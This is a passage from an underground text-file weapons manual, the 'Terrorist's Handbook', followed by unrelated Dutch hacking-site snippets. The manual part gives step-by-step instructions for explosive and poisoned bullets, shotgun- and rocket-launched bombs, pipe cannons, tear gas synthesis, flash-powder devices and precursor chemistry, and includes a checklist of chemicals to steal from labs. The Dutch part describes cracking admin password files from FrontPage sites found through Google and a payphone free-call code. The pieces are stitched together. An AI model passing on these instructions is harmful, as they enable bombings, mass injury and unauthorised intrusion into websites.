is modified incorrectly, in such a way that it makes the bullet even the
slightest bit wider, an explosion in the barrel of the weapon will occur. For
this reason, NOBODY SHOULD EVER ATTEMPT TO MANUFACTURE SUCH AMMUNITION.

5.21 SPECIAL AMMUNITION FOR HANDGUNS

If an individual wished to produce explosive ammunition for his/her
handgun, he/she could do it, provided that the person had an impact-sensitive
explosive and a few simple tools. One would first purchase all
lead bullets,
and then make or acquire an impact-detonating explosive. By drilling a hole
in a lead bullet with a drill, a space could be created for the placement of
an explosive. After filling the hole with an explosive, it would be sealed
in the bullet with a drop of hot wax from a candle. A diagram of a completed
exploding bullet is shown below.
_o_ ------------ drop of wax
/|*|\
| |*|-|----------- impact-sensitive explosive
| |_| |
|_____|
This hollow space design also works for putting poison in bullets.




5.22 SPECIAL AMMUNITION FOR SHOTGUNS
Because of their large bore and high power, it is possible to create
some extremely powerful special ammunition for use in shotguns. If a shotgun
shell is opened at the top, and the shot removed, the shell can be re-closed.
Then, if one can find a very smooth, lightweight wooden dowel that is close to
the bore width of the shotgun, a person
can make several types of shotgun-
launched weapons. Insert the dowel in the barrel of the shotgun with the
shell without the shot in the firing chamber. Mark the dowel about six inches
away from the end of the barrel, and remove it from the barrel. Next, decide
what type of explosive or incendiary device is to be used. This device can be a
chemical fire bottle (sect. 3.43), a pipe bomb (sect 4.42), or a thermit bomb
(sect 3.41 and 4.42). After the device is made, it must be securely attached to
the dowel. When this is done, place the dowel back in the shotgun. The bomb or
incendiary device should be on the end of the dowel. Make sure that the device
has a long enough fuse, light the fuse, and fire the shotgun. If the projectile
is not too heavy, ranges of up to 300 ft are possible. A diagram of a shotgun
projectile is shown below:



____
|| |
|| |
|| | ----- bomb, securely taped to dowel
|| |
||__|
|| |
|| | ------- fuse
|| |
||
||
||
|| --------- dowel
||
||
||
||
||
|| --------- insert this end into shotgun



5.3 SPECIAL AMMUNITION FOR COMPRESSED AIR/GAS WEAPONS

This section deals with the manufacture of special ammunition for
compressed air or compressed gas weapons, such as pump B.B guns, CO2 B.B guns,
and .22 cal pellet guns. These weapons, although usually thought of as kids
toys, can be made into rather dangerous weapons.













5.31 SPECIAL AMMUNITION FOR B.B GUNS

A B.B gun, for this manuscript, will be considered any type of rifle or
pistol that uses compressed air or CO2 gas to fire a projectile with a caliber
of .177, either B.B, or lead pellet. Such guns can have almost as high a muzzle
velocity as a bullet-firing rifle. Because of the speed at which a .177 caliber
projectile flies,
an impact detonating projectile can easily be made that has a
caliber of .177. Most ammunition for guns of greater than .22 caliber use
primers to ignite the powder in the bullet. These primers can be bought at gun
stores, since many people like to reload their own bullets. Such primers
detonate when struck by the firing pin of a gun. They will also detonate if
they are thrown at a hard surface at a great speed. Usually, they will also fit
in the barrel of a .177 caliber gun. If they are inserted flat end first, they
will detonate when the gun is fired at a hard surface. If such a primer is
attached to a piece of thin metal tubing, such as that used in an antenna, the
tube can be filled with an explosive, be sealed, and fired from a B.B gun. A
diagram of such a projectile appears below:

_____ primers _______
| |
| |
| |
V V
______ ______
| ________________________ |-------------------
| ****** explosive ******* |------------------- } tassel or
| ________________________ |------------------- cotton
|_____ _____|-------------------
^
|
|
|_______ antenna tubing
The front primer is attached to the tubing with a drop of super glue.
The tubing is then filled with an explosive, and the rear primer is glued on.
Finally, a tassel, or a small piece of cotton is glued to the rear primer, to
insure that the projectile strikes on the front primer. The entire projectile
should be about 3/4 of an inch long.


5.32 SPECIAL AMMUNITION FOR .22 CALIBER PELLET GUNS

A .22 caliber pellet gun usually is equivalent to a .22 cal rifle, at
close ranges. Because of this, relatively large explosive projectiles can be
adapted for use with .22 caliber air rifles. A design similar to that used in
section 5.12 is suitable, sinc
e some capsules are about .22 caliber or smaller.
Or, a design similar to that in section 5.31 could be used, only one would have
to purchase black powder percussion caps, instead of ammunition primers, since
there are percussion caps that are about .22 caliber. A #11 cap is too small,
but anything larger will do nicely.











6.0 ROCKETS AND CANNONS

Rockets and cannon are generally thought of as heavy artillery.
Perpetrators of violence do not usually employ such devices, because they are
difficult or impossible to acquire. They are not, however, impossible to make.
Any individual who can make or buy black powder or pyrodex can make such things.
A terrorist with a cannon or large rocket is, indeed, something to fear.


6.1 ROCKETS

Rockets were first developed by the Chinese several hundred years
before Christ. They were used for entertainment, in the form of fireworks.
They were not usually used for military purposes because they were inaccurate,
expensive, and unpredictable.
In modern times, however, rockets are used
constantly by the military, since they are cheap, reliable, and have no recoil.
Perpetrators of violence, fortunately, cannot obtain military rockets, but they
can make or buy rocket engines. Model rocketry is a popular hobby of the space
age, and to launch a rocket, an engine is required. Estes, a subsidiary of
Damon, is the leading manufacturer of model rockets and rocket engines. Their
most powerful engine, the "D" engine, can develop almost 12 lbs. of thrust;
enough to send a relatively large explosive charge a significant distance.
Other companies, such as Centuri, produce even larger rocket engines, which
develop up to 30 lbs. of thrust. These model rocket engines are quite reliable,
and are designed to be fired electrically. Most model rocket engines have
three basic sections. The diagram below will help explain them.

__________________________________________________________
|_________________________________________________________| -- car
dboard
\ clay | - - - - - - - - - - | * * * | . . . .|c| casing
\_______| - - - - - - - - - | * * * | . . . |l|
______ _ - - - thrust - - - | smoke | eject |a|
/ clay | - - - - - - - - - | * * * | . . . .|y|
/________|_____________________|_______|________|_|_______
|_________________________________________________________| -- cardboard
casing

The clay nozzle is where the igniter is inserted. When the area labeled
"thrust" is ignited, the "thrust" material, usually a large single grain of a
propellant such as black powder or pyrodex, burns, forcing large volumes of hot,
rapidly expanding gasses out the narrow nozzle, pushing the rocket forward.
After the material has been consumed, the smoke section of the engine is
ignited. It is usually a slow-burning material, similar to black powder that
has had various compounds added to it to produce visible smoke, usually black,
white, or yellow in color.
This section exists so that the rocket will be seen
when it reaches its maximum altitude, or apogee. When it is burned up, it
ignites the ejection charge, labeled "eject". The ejection charge is finely
powdered black powder. It burns very rapidly, exploding, in effect. The
explosion of the ejection charge pushes out the parachute of the model rocket.
It could also be used to ignite the fuse of a bomb...










Rocket engines have their own peculiar labeling system. Typical engine
labels are: 1/4A-2T, 1/2A-3T, A8-3, B6-4, C6-7, and D12-5. The letter is an
indicator of the power of an engine. "B" engines are twice as powerful as "A"
engines, and "C" engines are twice as powerful as "B" engines, and so on. The
number following the letter is the approximate thrust of the engine, in pounds.
the final number and letter is the time delay, from the time that the thrust
period of engine burn ends until the ejection charge fires; "3T" indicates a
3 second delay.

NOTE: an extremely effective rocket
propellant can be made by mixing aluminum
dust with ammonium perchlorate and a very small amount of iron oxide.
The mixture is bound together by an epoxy.


6.11 BASIC ROCKET BOMB

A rocket bomb is simply what the name implies: a bomb that is delivered
to its target by means of a rocket. Most people who would make such a device
would use a model rocket engine to power the device. By cutting fins from balsa
wood and gluing them to a large rocket engine, such as the Estes "C" engine, a
basic rocket could be constructed. Then, by attaching a "crater maker", or CO2
cartridge bomb to the rocket, a bomb would be added. To insure that the fuse of
the "crater maker" (see sect. 4.42) ignited, the clay over the ejection charge
of the engine should be scraped off with a plastic tool. The fuse of the bomb
should be touching the ejection charge, as shown below.

____________ rocket engine
| _________ crater maker
| |
| |
V |
_______________________________V_
|_______________________________| ______________________
\ | - - - - - -|***|::::| /# # # # # # # # # # # \
\__| - - - - - -|***|::::| ___/ # # # # # # # # # # # \
__ - - - - - -|***|::::|---fuse--- # # explosive # # )
/ | - - - - - -|***|::::| ___ # # # # # # # # # # # /
/___|____________|___|____|____ \_______________________/
|_______________________________|

thrust> - - - - - -
smoke> ***
ejection charge> ::::

Duct tape is the best way to attach the crater maker to the rocket
engine. Note in the diagram the absence of the clay over the ejection charge
Many different types of explosive payloads can be attached to the rocket, such
as a high explosive, an incendiary device, or a chemical fire bottle.


Either four or three fins must be glued to the rocket engine to insure that
the rocket flies straight. T
he fins should look like the following diagram:




|\
| \
| \
| \ <--------- glue this to rocket engine
| \
| \
| \
| |
| |
| |
leading edge |
-------> |
| |
| | trailing edge
| | <--------
| |
| |
| |
| |
\_____/

The leading edge and trailing edge should be sanded with sandpaper so
that they are rounded. This will help make the rocket fly straight. A two
inch long section of a plastic straw can be attached to the rocket to launch it
from. A clothes hanger can be cut and made into a launch rod. The segment of
a plastic straw should be glued to the rocket engine adjacent to one of the fins
of the rocket. A front view of a completed rocket bomb is shown below.


|
fin | <------ fin
| | |
| | |
| __|__ |
V / \ V
---------------| |---------------
\_____/
|o <----------- segment of plastic straw
|
|
| <------ fin
|
|
By cutting a coat hanger at the indicated arrows, and bending it, a
launch rod can be made. After a fuse is inserted in the engine, the rocket is
simply slid down the launch rod, which is put through the segment of plastic
straw. The rocket should slide easily along a coathanger, such as the one
illustated on the following page:













____
/ \
| |
cut here _____ |
| |
| |
| / \
V / \
_________________/ \________________
/ \
/ \
/____________________________________________\
^
|
|
and here ______|

Bend wire to this shape:

_______ insert into straw
|
|
|
V
____________________________________________
\
\
\
\
\ <--------- bend here to adjust flight angle
|
|
|
|
|
| <---------- put this end in ground
|


6.12 LONG RANGE ROCKET BOMB

Long range rockets
can be made by using multi-stage rockets. Model
rocket engines with an "0" for a time delay are designed for use in multi-
stage rockets. An engine such as the D12-0 is an excellent example of such an
engine. Immediately after the thrust period is over, the ejection charge
explodes. If another engine is placed directly against the back of an "0"
engine, the explosion of the ejection charge will send hot gasses and burning
particles into the nozzle of the engine above it, and ignite the thrust section.
This will push the used "0" engine off of the rocket, causing an overall loss of
weight. The main advantage of a multi-stage rocket is that it loses weight as
travels, and it gains velocity. A multi-stage rocket must be designed somewhat
differently than a single stage rocket, since, in order for a rocket to fly
straight, its center of gravity must be ahead of its center of drag. This is
accomplished by adding weight to the front of the rocket, or by moving the
center of drag back by putting fins on the
rocket that are well behind the
rocket. A diagram of a multi-stage rocket appears on the following page:





___
/ \
| |
| C |
| M | ------ CM: Crater Maker
| |
| |
|___|
| |
| |
| |
| C | ------ C6-5 rocket engine
/| 6 |\
/ | | | \
/ | 5 | \
/ |___| \ ---- fin
/ /| |\ \
/ / | | \ \
/ / | | \ \
/ / | C | \ \
| / | 6 | \ |
| / | | | \ |
| / | 0 | \ |
|/ |___| \|
| / \ |
\______/ ^ \______/ ------- fin
|
|
|
|
C6-0 rocket engine

The fuse is put in the bottom engine.

Two, three, or even four stages can be added to a rocket bomb to give it
a longer range. It is important, however, that for each additional stage, the
fin area gets larger.


6.13 MULTIPLE WARHEAD ROCKET BOMBS

"M.R.V." is an acronym for Multiple Reentry Vehicle. The concept is
simple: put more than one explosive warhead on a single missile. This can be
done without too much difficulty by anyone who knows how to make crater-makers
and can buy rocket engines. By attaching crater makers with long fuses to a
rocket, it is possible that a single rocket could deliver several explosive
devices to a target. Such a rocket might look like the diagram on the
following page:













___
/ \
| |
| C |
| M |
|___|
___| |___
| | | |
| | T | |
/ \ | U | / \
/ \| B |/ \
| || E || |
| C || || C |
| M || || M |
| ||___|| |
\___/| E |\___/
| N |
/| G |\
/ | I | \
/ | N | \
/ | E | \
/ |___| \
/ fin/ | \ fin\
| / | \ |
\__/ | \__/
^
|____ fin

The crater makers are attached to the tube of rolled paper with tape.
the paper tube is made by rolling and gluing a 4 inch by 8 inch piece of paper.
The tube is glued to the engine, and is filled with gunpowder or black powder.
Small holes are punched in it, and the fuses of the crater makers are inserted
in these holes. A crater maker is glued to the open end of the tube, so that
its fuse is inside the tube. A fuse is inserted in the engine, or in the bottom
engine if the rocket bomb is multi stage, and the rocket is launched from the
coathanger launcher, if a segment of a plastic straw has been attached to it.


6.2 CANNON

The cannon is a
piece of artillery that has been in use since the
11th century. It is not unlike a musket, in that it is filled with powder,
loaded, and fired. Cannons of this sort must also be cleaned after each shot,
otherwise, the projectile may jam in the barrel when it is fired, causing the
barrel to explode. A sociopath could build a cannon without too much trouble,
if he/she had a little bit of money, and some patience.















6.21 BASIC PIPE CANNON

A simple cannon can be made from a thick pipe by almost anyone. The
only difficult part is finding a pipe that is extremely smooth on its interior.
This is absolutely necessary; otherwise, the projectile may jam. Copper or
aluminum piping is usually smooth enough, but it must also be extremely thick to
withstand the pressure developed by the expanding hot gasses in a cannon. If
one uses a projectile such as a CO2 cartridge, since such a projectile can be
made to explode, a pipe that is about 1.5 - 2 feet long is ideal. Such a pipe
MUST have wall
s that are at least 1/3 to 1/2 an inch thick, and be very smooth
on the interior. If possible, screw an endplug into the pipe. Otherwise, the
pipe must be crimped and folded closed, without cracking or tearing the pipe.
A small hole is drilled in the back of the pipe near the crimp or endplug.
Then, all that need be done is fill the pipe with about two teaspoons of
grade blackpowder or pyrodex, insert a fuse, pack it lightly by ramming a wad
of tissue paper down the barrel, and drop in a CO2 cartridge. Brace the cannon
securely against a strong structure, light the fuse, and run. If the person is
lucky, he will not have overcharged the cannon, and he will not be hit by
pieces of exploding barrel. Such a cannon would look like this:
__________________ fuse hole
|
|
V
________________________________________________________________
| |______________________________________________________________|
|endplug|powder|t.p.| CO2 cartridge
| ______|______|____|____________________________________________
|_|______________________________________________________________|

An exploding projectile can be made for this type of cannon with a CO2
cartridge. It is relatively simple to do. Just make a crater maker, and
construct it such that the fuse projects about an inch from the end of the
cartridge. Then, wrap the fuse with duct tape, covering it entirely, except for
a small amount at the end. Put this in the pipe cannon without using a tissue
paper packing wad. When the cannon is fired, it will ignite the end of the fuse,
and shoot the CO2 cartridge. The explosive-filled cartridge will explode in
about three seconds, if all goes well. Such a projectile would look like this:

___
/ \
| |
| C |
| M |
| |
| |
|\ /|
| | | ---- tape
|_|_|
|
| ------ fuse











6.22 ROCKET FIRING CANNON

A rocke
t firing cannon can be made exactly like a normal cannon; the
only difference is the ammunition. A rocket fired from a cannon will fly
further than a rocket alone, since the action of shooting it overcomes the
initial inertia. A rocket that is launched when it is moving will go further
than one that is launched when it is stationary. Such a rocket would resemble
a normal rocket bomb, except it would have no fins. It would look like this:

___
/ \
| |
| C |
| M |
| |
| |
|___|
| E |
| N |
| G |
| I |
| N |
| E |
|___|

the fuse on such a device would, obviously, be short, but it would not
be ignited until the rocket's ejection charge exploded. Thus, the delay before
the ejection charge, in effect, becomes the delay before the bomb explodes.
Note that no fuse need be put in the rocket; the burning powder in the cannon
will ignite it, and simultane
ously push the rocket out of the cannon at a high
velocity.


7.0 PYROTECHNICA ERRATA

There are many other types of pyrotechnics that a perpetrator of
violence might employ. Smoke bombs can be purchased in magic stores, and large
military smoke bombs can be bought through adds in gun and military magazines.
Also, fireworks can also be used as weapons of terror. A large aerial display
rocket would cause many injuries if it were to be fired so that it landed on the
ground near a crowd of people. Even the "harmless" pull-string fireworks, which
consists of a sort of firecracker that explodes when the strings running
through it are pulled, could be placed inside a large charge of a sensitive
high explosive. Tear gas is another material that might well be useful
to the sociopath, and such a material could be instantly disseminated over
a large crowd by means of a rocket-bomb, with nasty effects.














7.1 SMOKE BOMBS

One type of pyrotechnic device that might be employed by a terrori
st in
many way would be a smoke bomb. Such a device could conceal the getaway route,
or cause a diversion, or simply provide cover. Such a device, were it to
produce enough smoke that smelled bad enough, could force the evacuation of a
building, for example. Smoke bombs are not difficult to make. Although the
military smoke bombs employ powdered white phosphorus or titanium compounds,
such materials are usually unavailable to even the most well-equipped terrorist.
Instead, he/she would have to make the smoke bomb for themselves.
Most homemade smoke bombs usually employ some type of base powder, such
as black powder or pyrodex, to support combustion. The base material will burn
well, and provide heat to cause the other materials in the device to burn, but
not completely or cleanly. Table sugar, mixed with sulfur and a base material,
produces large amounts of smoke. Sawdust, especially if it has a small amount
of oil in it, and a base powder works well also. Other excellent smoke
ingredients are s
mall pieces of rubber, finely ground plastics, and many
chemical mixtures. The material in road flares can be mixed with sugar and
sulfur and a base powder produces much smoke. Most of the fuel-oxodizer
mixtures, if the ratio is not correct, produce much smoke when added to a base
powder. The list of possibilities goes on and on. The trick to a successful
smoke bomb also lies in the container used. A plastic cylinder works well, and
contributes to the smoke produced. The hole in the smoke bomb where the fuse
enters must be large enough to allow the material to burn without causing an
explosion. This is another plus for plastic containers, since they will melt
and burn when the smoke material ignites, producing an opening large enough to
prevent an explosion.

7.2 COLORED FLAMES
Colored flames can often be used as a signaling device for terrorists.
by putting a ball of colored flame material in a rocket; the rocket, when the
ejection charge fires, will send out a burning colored ball. The ma
terials that
produce the different colors of flames appear below.

COLOR MATERIAL USED IN
ÄÄÄÄÄ ÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄ
_______________________________________________________________________________
red strontium road flares,
salts red sparklers
(strontium nitrate)
_______________________________________________________________________________
green barium salts green sparklers
(barium nitrate)
_______________________________________________________________________________
yellow sodium salts gold sparklers
(sodium nitrate)
_______________________________________________________________________________
blue powdered copper blue sparklers,
old pennies
_________________________________________
______________________________________
white powdered magnesium firestarters,
or aluminum aluminum foil
_______________________________________________________________________________
purple potassium permanganate purple fountains,
treating sewage
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ




7.3 TEAR GAS
A terrorist who could make tear gas or some similar compound could use
it with ease against a large number of people. Tear gas is fairly complicated
to make, however, and this prevents such individuals from being able to utilize
its great potential for harm. One method for its preparation is shown below.
EQUIPMENT
_________
1. ring stands (2)
2. alcohol burner
3. erlenmeyer flask, 300 ml
4. clamps (2)
5. rubber stopper
6. glass tubing
7. clamp holder
8. condenser
9. rubber tubing
10. collecting flask
11. air trap
12. beaker, 300 ml

MATERIALS
_________
10 gms glycerine
2 gms sodium bisulfate
distilled water

1.) In an open area, wearing a gas mask, mix 10 gms of glycerine with 2 gms
of sodium bisulfate in the 300 ml erlenmeyer flask.
2.) Light the alcohol burner, and gently heat the flask.
3.) The mixture will begin to bubble and froth; these bubbles are tear gas.
4.) When the mixture being heated ceases to froth and generate gas, or a brown
residue becomes visible in the tube, the reaction is complete. Remove the
heat source, and dispose of the heated mixture, as it is corrosive.
5.) The material that condenses in the condenser and drips into the collecting
flask is tear gas. It must be capped tightly, and stored in a safe place.

7.4 FIREWORKS

While fireworks cannot really be used as an effective means of terror,
they do have some value as distractions or incendiaries.
There are several
basic types of fireworks that can be made in the home, whether for fun, profit,
or nasty uses.









7.41 FIRECRACKERS

A simple firecracker can be made from cardboard tubing and epoxy.
The instructions are below:
1) Cut a small piece of cardboard tubing from the tube you are using.
"Small" means anything less than 4 times the diameter of the tube.
2) Set the section of tubing down on a piece of wax paper, and fill
it with epoxy and the drying agent to a height of 3/4 the diameter
of the tubing. Allow the epoxy to dry to maximum hardness, as
specified on the package.
3) When it is dry, put a small hole in the middle of the tube, and
insert a desired length of fuse.
4) Fill the tube with any type of flame-sensitive explosive. Flash
powder, pyrodex, black powder, potassium picrate, lead azide,
nitrocellulose, or any of the fast burning fuel-oxodizer mixtures
will do nicely. Fill the tube al
most to the top.
5) Pack the explosive tightly in the tube with a wad of tissue paper
and a pencil or other suitable ramrod. Be sure to leave enough space
for more epoxy.
6) Fill the remainder of the tube with the epoxy and hardener, and allow
it to dry.
7) For those who wish to make spectacular firecrackers, always use
flash powder, mixed with a small amount of other material for
colors. By crushing the material on a sparkler, and adding it
to the flash powder, the explosion will be the same color as the
sparkler. By adding small chunks of sparkler material, the
device will throw out colored burning sparks, of the same color
as the sparkler. By adding powdered iron, orange sparks will
be produced. White sparks can be produced from magnesium shavings,
or from small, LIGHTLY crumpled balls of aluminum foil.
Example: Suppose I wish to make a firecracker that will explode
wit
h a red flash, and throw out white sparks. First,
I would take a road flare, and finely powder the material
inside it. Or, I could take a red sparkler, and finely
powder it. Then, I would mix a small amount of this
material with the flash powder. (NOTE: FLASH POWDER
MAY REACT WITH SOME MATERIALS THAT IT IS MIXED WITH, AND
EXPLODE SPONTANEOUSLY!) I would mix it in a ratio of
9 parts flash powder to 1 part of flare or sparkler
material, and add about 15 small balls of aluminum foil
I would store the material in a plastic bag overnight
outside of the house, to make sure that the stuff doesn't
react. Then, in the morning, I would test a small amount
of it, and if it was satisfactory, I would put it in the
firecracker.
8) If this type of firecracker is mounted on a rocket engine,
professional to semi-p
rofessional displays can be produced.








7.42 SKYROCKETS

An impressive home made skyrocket can easily be made in the home from
model rocket engines. Estes engines are recommended.
1) Buy an Estes Model Rocket Engine of the desired size, remembering
that the power doubles with each letter. (See sect. 6.1 for details)
2) Either buy a section of body tube for model rockets that exactly
fits the engine, or make a tube from several thicknesses of paper
and glue.
3) Scrape out the clay backing on the back of the engine, so that
the powder is exposed. Glue the tube to the engine, so that the
tube covers at least half the engine. Pour a small charge of
flash powder in the tube, about 1/2 an inch.
4) By adding materials as detailed in the section on firecrackers,
various types of effects can be produced.
5) By putting Jumping Jacks or bottle rockets without the stick
in the tube, spectacular displays with
moving fireballs or
M.R.V.'s can be produced.
6) Finally, by mounting many home made firecrackers on the tube with
the fuses in the tube, multiple colored bursts can be made.

7.43 ROMAN CANDLES
Roman candles are impressive to watch. They are relatively difficult
to make, compared to the other types of home-made fireworks, but they are
well worth the trouble.
1) Buy a 1/2 inch thick model rocket body tube, and reinforce it
with several layers of paper and/or masking tape. This must
be done to prevent the tube from exploding. Cut the tube into
about 10 inch lengths.
2) Put the tube on a sheet of wax paper, and seal one end with epoxy
and the drying agent. About 1/2 of an inch is sufficient.
3) Put a hole in the tube just above the bottom layer of epoxy,
and insert a desired length of water proof fuse. Make sure that
the fuse fits tightly.
4) Pour about 1 inch of pyrodex or gunpowder down the open e
nd of the
tube.
5) Make a ball by powdering about two 6 inch sparklers of the desired
color. Mix this powder with a small amount of flash powder and
a small amount of pyrodex, to have a final ratio (by volume) of
60% sparkler material / 20% flash powder / 20% pyrodex. After
mixing the powders well, add water, one drop at a time, and mixing
continuously, until a damp paste is formed. This paste should
be moldable by hand, and should retain its shape when left alone.
Make a ball out of the paste that just fits into the tube. Allow
the ball to dry.






6) When it is dry, drop the ball down the tube. It should slide down
fairly easily. Put a small wad of tissue paper in the tube, and pack
it gently against the ball with a pencil.
7) When ready to use, put the candle in a hole in the ground, pointed
in a safe direction, light the fuse, and run. If the device works,
a colored fireball
should shoot out of the tube to a height of
about 30 feet. This height can be increased by adding a slightly
larger powder charge in step 4, or by using a slightly longer tube.
8) If the ball does not ignite, add slightly more pyrodex in step 5.
9) The balls made for roman candles also function very well in rockets,
producing an effect of falling colored fireballs.


8.0 LISTS OF SUPPLIERS AND MORE INFORMATION

Most, if not all, of the information in this publication can be obtained
through a public or university library. There are also many publications that
are put out by people who want to make money by telling other people how to
make explosives at home. Adds for such appear frequently in paramilitary
magazines and newspapers. This list is presented to show the large number of
places that information and materials can be purchased from. It also includes
fireworks companies and the like.

COMPANY NAME AND ADDRESS WHAT COMPANY SELLS
ÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
FULL AUTO CO. INC. EXPLOSIVE RECIPES,
P.O. BOX 1881 PAPER TUBING
MURFREESBORO, TN
37133
_______________________________________________________________________________
UNLIMITED CHEMICALS AND FUSE
BOX 1378-SN
HERMISTON, OREGON
97838
_______________________________________________________________________________
AMERICAN FIREWORKS NEWS FIREWORKS NEWS MAGAZINE WITH
SR BOX 30 SOURCES AND TECHNIQUES
DINGMAN'S FERRY, PENNSYLVANIA
18328
_______________________________________________________________________________
BARNETT INTERNATIONAL INC. BOWS, CROSSBOWS, ARCHERY MATERIALS,
125 RUNNELS STREET AIR RIFLES
P.O. BOX 226
PORT HURON, MICHIGAN
48060
_______________________________________________________________________________
CROSSMAN AIR GUNS AIR GUNS
P.O. BOX 22927
ROCHES
TER, NEW YORK
14692




_______________________________________________________________________________
EXECUTIVE PROTECTION PRODUCTS INC. TEAR GAS GRENADES,
316 CALIFORNIA AVE. PROTECTION DEVICES
RENO, NEVADA
89509
_______________________________________________________________________________
BADGER FIREWORKS CO. INC. CLASS "B" AND "C" FIREWORKS
BOX 1451
JANESVILLE, WISCONSIN
53547
_______________________________________________________________________________
NEW ENGLAND FIREWORKS CO. INC. CLASS "C" FIREWORKS
P.O. BOX 3504
STAMFORD, CONNECTICUTT
06095
_______________________________________________________________________________
RAINBOW TRAIL CLASS "C" FIREWORKS
BOX 581
EDGEMONT, PENNSYLVANIA
19028
_______________________________________________________________________________
STONINGTON FIREWORKS INC. CLASS "C" AND "B" FIREWORKS
4010 NEW WILSEY BAY U.25 ROAD
RAPID RIVER, MICHIGAN
49878
___________
____________________________________________________________________
WINDY CITY FIREWORKS INC. CLASS "C" AND "B" FIREWORKS
P.O. BOX 11 (GOOD PRICES!)
ROCHESTER, INDIANNA
46975
_______________________________________________________________________________

BOOKS
ÄÄÄÄÄ
THE ANARCHIST'S COOKBOOK
THE IMPROVISED MUNITIONS MANUAL
MILITARY EXPLOSIVES
FIRES AND EXPLOSIONS
















9.0 CHECKLIST FOR RAIDS ON LABS
In the end, the serious terrorist would probably realize that if he/she
wishes to make a truly useful explosive, he or she will have to steal the
chemicals to make the explosive from a lab. A list of such chemicals in order
of priority would probably resemble the following:
LIQUIDS SOLIDS
_______ ______
____ Nitric Acid ____ Potassium Perchlorate
____ Sulfuric Acid ____ Potassium Chlorate
____ 95% Ethanol ____ Picric Acid (usually a po
wder)
____ Toluene ____ Ammonium Nitrate
____ Perchloric Acid ____ Powdered Magnesium
____ Hydrochloric Acid ____ Powdered Aluminum
____ Potassium Permanganate
____ Sulfur
____ Mercury
____ Potassium Nitrate
____ Potassium Hydroxide
____ Phosphorus
____ Sodium Azide
____ Lead Acetate
____ Barium Nitrate

10.0 USEFUL PYROCHEMISTRY
In general, it is possible to make many chemicals from just a few basic
ones. A list of useful chemical reactions is presented. It assumes knowledge
of general chemistry; any individual who does not understand the following
reactions would merely have to read the first five chapters of a high school
chemistry book.

1. potassium perchlorate from perchloric acid and po
tassium hydroxide
K(OH) + HClO ----> KClO + H O
4 4 2
2. potassium nitrate from nitric acid and potassium hydroxide
" + HNO ----> KNO + "
3 3
3. ammonium perchlorate from perchloric acid and ammonium hydroxide
NH OH + HClO ----> NH ClO + "
3 4 3 4
4. ammonium nitrate from nitric acid and ammonium hydroxide
NH OH + HNO ----> NH NO + "
3 3 3 3
5. powdered aluminum from acids, aluminum foil, and magnesium
A. aluminum foil + 6HCl ----> 2AlCl + 3H
3 2
B. 2AlCl (aq) + 3Mg ----> 3MgCl (aq) + 2Al
3 2





The Al will be a very fine silvery powder at the bottom of the container
which must be fi
ltered and dried. This same method works with nitric and
sulfuric acids, but these acids are too valuable in the production of high
explosives to use for such a purpose, unless they are available in great excess.

11.0 ABOUT THE AUTHOR

The author, who wishes his name to be unknown, is presently attending
a college in the United States of America, majoring in Engineering. He was
raised by his parents on the East Coast, and received his high school education
there. He first became interested in pyrotechnics when he was about eight years
of age. At age twelve, he produced his first explosive device; it was slightly
more powerful than a large firecracker. He continued to produce explosive
devices for several years. He also became interested in model rocketry, and has
built several rockets from kits, and designed his own rockets. While in high
school, the author became affiliated with CHAOS, and eventually became the
head of Gunzenbomz Pyro-Technologies. At this time, at age 18, he produced
hi
s first high explosive device, putting a 1 foot deep crater in an associate's
back yard. He had also produced many types of rockets, explosive ammunition,
and other pyrotechnic devices. While he was heading Gunzenbomz Pyro-
Technologies, he was injured when a home made device exploded in his hand; he
did not make the device. The author learned, however, and then decided to
reform, and although he still constructs an occasional explosive device, he
chooses to abstain from their production. An occasional rocket that produces
effects similar to that of professional displays can sometimes be seen in the
midnight sky near his college, and the Fourth of July is still his favorite day
of the year.

Pax et Discordia,
the Author

HERE ENDS THE FIRST PUBLICATION OF THE TERRORIST'S HANDBOOK. THIS IS THE ONLY
AUTHORIZED PUBLICATION, AND THE SOLE PRODUCTION RIGHTS BELONG TO CHAOS
INDUSTRIES AND GUNZENBOMZ PYRO-TECHNOLOGIES.

Gratis bellen

Ga naar een telefooncel van KPN, en typ het volgende in:

*0000#

Er staat nu op het display GRATIS BELLEN, have fun;-)

Let op: Deze werkt alleen op de oude KPN-telefooncellen!

 

 

Frontpage sites rooten

keeej
dit is alweer een makkiej..

Oude frontpage sites rooten
Wat heb je nodig.
Google
en John the ripper

Hoe ga je te werk:
Simpel:
zoek op google naar: _vti_pvt dit is de map van de vroegere frontpage extensie
hierin staan meestal admin.pwl
of administrator.pwl

.pwl zijn oude windows 98 bestanden.

Download deze bestanden

Wat kun je verder doen.
Ga naar dosprompt
zet de pwl in de map van john the ripper

tik nu in
john -i.pwl

dit kan enige tijd duren.. hij gaat nu alle wachtwoord controleren. en hieruit komt het wachtwoord van de administrator
dit kun je openen met telnet en ftp enzo.

Veel suc6.

 

 

 

 

Cursus ms dos

Let op: Als je niet ingelogd bent kan je maar 10% zien van alle tutorials zien!!

Inleiding

MS-DOS staat voor Microsoft Disk Operating System.
DOS is de voorganger van het wereldberoemde besturingssysteem MICROSOFT WINDOWS.
Dos is een erg oud operating system: het komt uit de jaren 80.
Het is alles wat de mensen hadden in die tijd. Windows kwam dus na DOS.
Ook is DOS erg ongebruiks vriendelijk.
Dat komt door de commando's(= opdrachten) die je moet weten...
In die tijd werd het dus vaak ook alleen gebruikt door experts.
Maar dos kan nog steeds veel dingen die Windows niet kan.
Het is nog erg gebruikelijk.
Windows draaide in DOS,
het maakt alleen zelf de commando's aan, die jij dan niet meer hoeft te typen.

Hoofdstuk 1: De basis

Oké dan... Laten we beginnen met het starten van DOS.
Je kan DOS op een paar manieren starten en wij nemen de makkelijke...
Ga naar de knop start >> uitvoeren >> typ: command (of bij winXP: cmd)

Nu zie je een zwart scherm met bovenaan in witte letters: C:\WINDOWS>
Dit noemen wij de opdrachtregel: Je typt achter deze regel dus je DOS-opdrachten.
C:\WINDOWS> betekent dat de huidige actieve directorie(= map) C:\WINDOWS> is.
Je kan dus vanaf hier klooien met bestanden in deze map...
